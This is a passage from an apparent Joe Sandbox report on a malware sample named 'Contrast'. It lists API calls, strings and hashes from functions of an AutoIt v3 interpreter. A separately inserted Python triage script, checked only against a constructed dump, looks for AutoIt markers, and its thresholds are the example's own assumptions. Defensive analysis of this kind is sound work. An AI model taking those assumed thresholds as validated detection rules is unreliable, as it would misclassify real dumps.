• Instruction Fuzzy Hash: BFA0223003020CFBCF002F82FC08888BFACEB023E0B008022F80C00032CB33A820AAC0
APIs
• CharUpperBuffW.USER32(?,?,005A0980), ref: 00593C65
• IsWindowVisible.USER32(?), ref: 00593C89
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: BuffCharUpperVisibleWindow
• String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
• API String ID: 4105515805-45149045
• Opcode ID: 74acf3e972ecff99f095df3e20d206a05ae21a2fd950513987cc981b507ba1ab
• Instruction ID: bfb4b0f952da757f2b2247181eef9fde6ad85814305c0aa814cef001da8c4843
• Opcode Fuzzy Hash: 74acf3e972ecff99f095df3e20d206a05ae21a2fd950513987cc981b507ba1ab
• Instruction Fuzzy Hash: F2D12930204206DBCF14EF50C469EAABFE5BF95354F144858F8865B2E2DB35EE4ACB81
APIs
• SetTextColor.GDI32(?,00000000), ref: 0059AC55
• GetSysColorBrush.USER32(0000000F), ref: 0059AC86
• GetSysColor.USER32(0000000F), ref: 0059AC92
• SetBkColor.GDI32(?,000000FF), ref: 0059ACAC
• SelectObject.GDI32(?,?), ref: 0059ACBB
• InflateRect.USER32(?,000000FF,000000FF), ref: 0059ACE6
• GetSysColor.USER32(00000010), ref: 0059ACEE
• CreateSolidBrush.GDI32(00000000), ref: 0059ACF5
• FrameRect.USER32(?,?,00000000), ref: 0059AD04
• DeleteObject.GDI32(00000000), ref: 0059AD0B
• InflateRect.USER32(?,000000FE,000000FE), ref: 0059AD56
• FillRect.USER32(?,?,?), ref: 0059AD88
• GetWindowLongW.USER32(?,000000F0), ref: 0059ADB3
  • Part of subcall function 0059AF18: GetSysColor.USER32(00000012), ref: 0059AF51
  • Part of subcall function 0059AF18: SetTextColor.GDI32(?,?), ref: 0059AF55
  • Part of subcall function 0059AF18: GetSysColorBrush.USER32(0000000F), ref: 0059AF6B
  • Part of subcall function 0059AF18: GetSysColor.USER32(0000000F), ref: 0059AF76
  • Part of subcall function 0059AF18: GetSysColor.USER32(00000011), ref: 0059AF93
  • Part of subcall function 0059AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0059AFA1
  • Part of subcall function 0059AF18: SelectObject.GDI32(?,00000000), ref: 0059AFB2
  • Part of subcall function 0059AF18: SetBkColor.GDI32(?,00000000), ref: 0059AFBB
  • Part of subcall function 0059AF18: SelectObject.GDI32(?,?), ref: 0059AFC8
  • Part of subcall function 0059AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 0059AFE7
  • Part of subcall function 0059AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0059AFFE
  • Part of subcall function 0059AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 0059B013
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
• String ID:
• API String ID: 4124339563-0
• Opcode ID: a14cf9cc7c70f1c7026eeeffa21c247ef3e6d1ef66c3e9a2e4e0833ff8fa4ee9
• Instruction ID: a2b08abd7d0e6d5d96dd97d072b7f13b10112d7e657ba5a224e69a167d9b3d66
• Opcode Fuzzy Hash: a14cf9cc7c70f1c7026eeeffa21c247ef3e6d1ef66c3e9a2e4e0833ff8fa4ee9
• Instruction Fuzzy Hash: 51A19F72418301BFDB519F64DC08E6B7BA9FF8A321F101A19F962961E0D731D948DFA2
APIs
• DestroyWindow.USER32(?,?,?), ref: 00513072
• DeleteObject.GDI32(00000000), ref: 005130B8
• DeleteObject.GDI32(00000000), ref: 005130C3
• DestroyIcon.USER32(00000000,?,?,?), ref: 005130CE
• DestroyWindow.USER32(00000000,?,?,?), ref: 005130D9
• SendMessageW.USER32(?,00001308,?,00000000), ref: 0054C77C
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0054C7B5
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0054CBDE
  • Part of subcall function 00511F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00512412,?,00000000,?,?,?,?,00511AA7,00000000,?), ref: 00511F76
• SendMessageW.USER32(?,00001053), ref: 0054CC1B
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0054CC32
• ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0054CC48
• ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0054CC53
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
• String ID: 0
• API String ID: 464785882-4108050209
• Opcode ID: d6dbe13792871ee09f31a6187d7048f356f3b274a78170ecfa7d28f64c1957a0
• Instruction ID: 0215c2bee2f43482d3f9bf31e2d9581bfeca6cdd6c742155367306483ed38faf
• Opcode Fuzzy Hash: d6dbe13792871ee09f31a6187d7048f356f3b274a78170ecfa7d28f64c1957a0
• Instruction Fuzzy Hash: C8129A30601201EFDB64DF24C898BE9BFE1FB89318F144569E995CB2A2C731ED85DB91
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
• String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 2660009612-1645009161
• Opcode ID: dcb1ee11740c95c5487cec2af2470b098942cb4e5a86cb0a59ab4bbb87e4cf83
• Instruction ID: 030251d3219023642fee6cdaa106f999d7bfdc3318cbdd74a371061c36a0e88a
• Opcode Fuzzy Hash: dcb1ee11740c95c5487cec2af2470b098942cb4e5a86cb0a59ab4bbb87e4cf83
• Instruction Fuzzy Hash: 4AA18F35A0021ABBCB14AF61E856EAE7F78BF86740F000029FD05AB2D2DB71DE55D750
                                                                                                                                        APIs
                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 00587BC8
                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00587C87
                                                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00587CC5
                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00587CD7
                                                                                                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00587D1D
                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00587D29
                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00587D6D
                                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00587D7C
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00587D8C
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00587D90
                                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00587DA0
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00587DA9
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00587DB2
                                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00587DDE
                                                                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00587DF5
                                                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00587E30
                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00587E44
                                                                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00587E55
                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00587E85
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00587E90
                                                                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00587E9B
                                                                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00587EA5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                        • API String ID: 2910397461-517079104
                                                                                                                                        • Opcode ID: 4e819818d921b8d9a1fcf4c201f6a3f5f6f93da8ca50bdfe1bcfcdb35b136e09
                                                                                                                                        • Instruction ID: 7770c9b27471b1188dfe3c0c0c9c742ac0042ac1a6f85059d4ac2ccd982d6f79
                                                                                                                                        • Opcode Fuzzy Hash: 4e819818d921b8d9a1fcf4c201f6a3f5f6f93da8ca50bdfe1bcfcdb35b136e09
                                                                                                                                        • Instruction Fuzzy Hash: A6A19FB1A50619BFEB14DBA4DC4AFAF7BA9FB59310F004115FA14A72E0D770AD04DB60
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0057B361
                                                                                                                                        • GetDriveTypeW.KERNEL32(?,005A2C4C,?,\\.\,005A0980), ref: 0057B43E
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,005A2C4C,?,\\.\,005A0980), ref: 0057B59C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                        • API String ID: 2907320926-4222207086
                                                                                                                                        • Opcode ID: c99703a6d97562b83f896ca99483b4819bcefcb8cd565463b134610303314fce
                                                                                                                                        • Instruction ID: bf6087ffc7f748a6b3f9d4b007134b98ad5e434a051e75195b87d72399b0f1a3
                                                                                                                                        • Opcode Fuzzy Hash: c99703a6d97562b83f896ca99483b4819bcefcb8cd565463b134610303314fce
                                                                                                                                        • Instruction Fuzzy Hash: F5516730B40209DFAB00DB60ED86F6D7FE1FB95740B24C519F40AA7291E771AE81EB55
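Added triage example (not part of the Joe Sandbox report or of the sample): the String IDs of the three functions above are not stealer logic but strings of the AutoIt v3 script interpreter itself: the script preprocessor's directive names and parse errors (#include, #requireadmin, #OnAutoItStartRegister, "Cannot parse #include"), the "AutoIt v3" window class and msctls_progress32 control of the interpreter's progress window, and the drive bus-type name table ("FileBackedVirtual", "RAMDisk", "iSCSI", …) used by the GetDriveTypeW caller. That is consistent with a dropped AutoIt runtime whose malicious behaviour comes from the compiled script it executes, so the .sdmp files listed under Memory Dump Source can be checked for these markers before time is spent reversing the interpreter. The script below does that over a constructed stand-in for a dump. The marker strings are copied from the report; the UTF-16LE plus ASCII search, the "several directives plus window class" threshold and the sample bytes are this example's own assumptions.

```python
"""Triage check: does a raw memory dump contain AutoIt v3 runtime markers?

Added example, not part of the Joe Sandbox report. Marker strings are copied
from the String ID fields of the functions above; thresholds and the
constructed sample dump are assumptions of this example.
"""
from __future__ import annotations

import re

# Directive and error strings from the script-preprocessor function.
AUTOIT_DIRECTIVE_MARKERS = (
    "#OnAutoItStartRegister",
    "#requireadmin",
    "#notrayicon",
    "#pragma compile",
    "#include-once",
    "#comments-start",
    "Bad directive syntax error",
    "Cannot parse #include",
    "Unterminated group of comments",
)

# Window-class and control-class strings from the progress-window function.
AUTOIT_GUI_MARKERS = ("AutoIt v3", "msctls_progress32")

# Bus-type names from the GetDriveTypeW function's string table.
DRIVE_BUS_MARKERS = (
    "FileBackedVirtual", "RAMDisk", "iSCSI", "Fibre", "SAS", "SATA",
    "Virtual", "PhysicalDrive",
)


def _needles(text: str) -> dict[str, bytes]:
    # The interpreter passes these strings to ...W APIs, so in memory they are
    # UTF-16LE; ASCII is searched too in case a dump was already decoded.
    return {"ascii": text.encode("ascii"), "utf-16le": text.encode("utf-16-le")}


def find_markers(dump: bytes, markers: tuple[str, ...]) -> dict[str, list[tuple[str, int]]]:
    """Map each marker that occurs in `dump` to its (encoding, offset) hits."""
    hits: dict[str, list[tuple[str, int]]] = {}
    for marker in markers:
        for enc, needle in _needles(marker).items():
            for m in re.finditer(re.escape(needle), dump):
                hits.setdefault(marker, []).append((enc, m.start()))
    return hits


def classify_dump(dump: bytes) -> dict:
    """Decide whether `dump` looks like the AutoIt v3 interpreter image.

    Threshold (assumption of this example): a stray "#include" in unrelated
    data must not be enough, so at least three distinct directive strings and
    the "AutoIt v3" window class are required.
    """
    directives = find_markers(dump, AUTOIT_DIRECTIVE_MARKERS)
    gui = find_markers(dump, AUTOIT_GUI_MARKERS)
    bus = find_markers(dump, DRIVE_BUS_MARKERS)
    return {
        "autoit_runtime": len(directives) >= 3 and "AutoIt v3" in gui,
        "directive_hits": directives,
        "gui_hits": gui,
        "drive_bus_hits": bus,
    }


def build_sample_dump() -> bytes:
    """Constructed stand-in for a .sdmp: deterministic filler with wide strings."""
    def filler(n: int) -> bytes:
        return bytes((i * 37) & 0xFF for i in range(n))

    parts = [filler(64)]
    for i, s in enumerate(("#requireadmin", "#notrayicon", "Cannot parse #include",
                           "AutoIt v3", "msctls_progress32", "FileBackedVirtual", "iSCSI")):
        parts += [s.encode("utf-16-le"), b"\x00\x00", filler(8 + 4 * i)]
    return b"".join(parts)


if __name__ == "__main__":
    result = classify_dump(build_sample_dump())
    print("AutoIt runtime:", result["autoit_runtime"])
    for name in ("directive_hits", "gui_hits", "drive_bus_hits"):
        for marker, locs in result[name].items():
            print(f"  {marker!r}: {locs}")
```

To use it on a real dump, pass the downloaded file's bytes to classify_dump(). A UTF-16LE hit at offset N inside the Source File dump sits at 0x511000 + N in the process image (the Offset field gives the module base). A match on the bus-type table alone is weak evidence, since those names are generic Windows storage terms; the directive strings together with the "AutoIt v3" window class are the discriminating ones.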
                                                                                                                                        APIs
                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0059A0F7
                                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0059A1B0
                                                                                                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 0059A1CC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 2326795674-4108050209
                                                                                                                                        • Opcode ID: 45e13a12f91ce3cf563aa57b191adf41784970e0a5d4c81a3c4b53e4c60dcb46
                                                                                                                                        • Instruction ID: 48301a6a864308c7a98a0d8d8eb86e24e3aad53a6c477d7f6c08ef129c266200
                                                                                                                                        • Opcode Fuzzy Hash: 45e13a12f91ce3cf563aa57b191adf41784970e0a5d4c81a3c4b53e4c60dcb46
                                                                                                                                        • Instruction Fuzzy Hash: D902D030208301AFEF25CF14C848BAABFE4FF99314F04891DF999962A1D775D954DBA2
                                                                                                                                        APIs
                                                                                                                                        • GetSysColor.USER32(00000012), ref: 0059AF51
                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 0059AF55
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0059AF6B
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 0059AF76
                                                                                                                                        • CreateSolidBrush.GDI32(?), ref: 0059AF7B
                                                                                                                                        • GetSysColor.USER32(00000011), ref: 0059AF93
                                                                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0059AFA1
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0059AFB2
                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0059AFBB
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 0059AFC8
                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0059AFE7
                                                                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0059AFFE
                                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0059B013
                                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0059B05F
                                                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0059B086
                                                                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0059B0A4
                                                                                                                                        • DrawFocusRect.USER32(?,?), ref: 0059B0AF
                                                                                                                                        • GetSysColor.USER32(00000011), ref: 0059B0BD
                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 0059B0C5
                                                                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0059B0D9
                                                                                                                                        • SelectObject.GDI32(?,0059AC1F), ref: 0059B0F0
                                                                                                                                        • DeleteObject.GDI32(?), ref: 0059B0FB
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 0059B101
                                                                                                                                        • DeleteObject.GDI32(?), ref: 0059B106
                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 0059B10C
                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 0059B116
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1996641542-0
                                                                                                                                        • Opcode ID: ee47eb720e5ebc1e2ba5209fd865988a5eee1ba866957ae953760fc350a4423b
                                                                                                                                        • Instruction ID: 72430947095874d7d4a0612ce95bfd57ce4597de14a53f4c3b9ac0f1b33ecc96
                                                                                                                                        • Opcode Fuzzy Hash: ee47eb720e5ebc1e2ba5209fd865988a5eee1ba866957ae953760fc350a4423b
                                                                                                                                        • Instruction Fuzzy Hash: F0617B71900218AFEF119FA4DC48AAE7FB9FF09320F105115F915AB2E1D7719944DF90
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 005990EA
                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005990FB
                                                                                                                                        • CharNextW.USER32(0000014E), ref: 0059912A
                                                                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0059916B
                                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00599181
                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00599192
                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 005991AF
                                                                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 005991FB
                                                                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00599211
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00599242
• _memset.LIBCMT ref: 00599267
• SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 005992B0
• _memset.LIBCMT ref: 0059930F
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 00599339
• SendMessageW.USER32(?,00001074,?,00000001), ref: 00599391
• SendMessageW.USER32(?,0000133D,?,?), ref: 0059943E
• InvalidateRect.USER32(?,00000000,00000001), ref: 00599460
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005994AA
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005994D7
• DrawMenuBar.USER32(?), ref: 005994E6
• SetWindowTextW.USER32(?,0000014E), ref: 0059950E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
• String ID: 0
• API String ID: 1073566785-4108050209
• Opcode ID: 86dad1588dd2e9733718b23791496c035ee19ca3cd89bae085eb11fb41059995
• Instruction ID: 579de6a408b111a0956fa8574a637379e6e0201fba570be52b32085712505494
• Opcode Fuzzy Hash: 86dad1588dd2e9733718b23791496c035ee19ca3cd89bae085eb11fb41059995
• Instruction Fuzzy Hash: 3AE18D74900209AFDF219F58CC88EEE7FB8FF49710F14815AF925AA290D7708A85DF61
APIs
• GetCursorPos.USER32(?), ref: 00595007
• GetDesktopWindow.USER32 ref: 0059501C
• GetWindowRect.USER32(00000000), ref: 00595023
• GetWindowLongW.USER32(?,000000F0), ref: 00595085
• DestroyWindow.USER32(?), ref: 005950B1
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 005950DA
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005950F8
• SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0059511E
• SendMessageW.USER32(?,00000421,?,?), ref: 00595133
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00595146
• IsWindowVisible.USER32(?), ref: 00595166
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00595181
• SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00595195
• GetWindowRect.USER32(?,?), ref: 005951AD
• MonitorFromPoint.USER32(?,?,00000002), ref: 005951D3
• GetMonitorInfoW.USER32(00000000,?), ref: 005951ED
• CopyRect.USER32(?,?), ref: 00595204
• SendMessageW.USER32(?,00000412,00000000), ref: 0059526F
Strings
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: baa6ea7a7b993bc744069e08c71bab1594f8b4e1be8df561c2446910ab1b7aba
• Instruction ID: c43140b9e1ca293a17d8c7dbb5fe0008546ecf309a7d78902e7c16baec1f123a
• Opcode Fuzzy Hash: baa6ea7a7b993bc744069e08c71bab1594f8b4e1be8df561c2446910ab1b7aba
• Instruction Fuzzy Hash: A0B19770604701AFDB05DF64C888B6ABFE4BF89300F008A1CF5999B291EB70EC55CB92
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 0057499C
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 005749C2
• _wcscpy.LIBCMT ref: 005749F0
• _wcscmp.LIBCMT ref: 005749FB
• _wcscat.LIBCMT ref: 00574A11
• _wcsstr.LIBCMT ref: 00574A1C
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00574A38
• _wcscat.LIBCMT ref: 00574A81
• _wcscat.LIBCMT ref: 00574A88
• _wcsncpy.LIBCMT ref: 00574AB3
Strings
Similarity
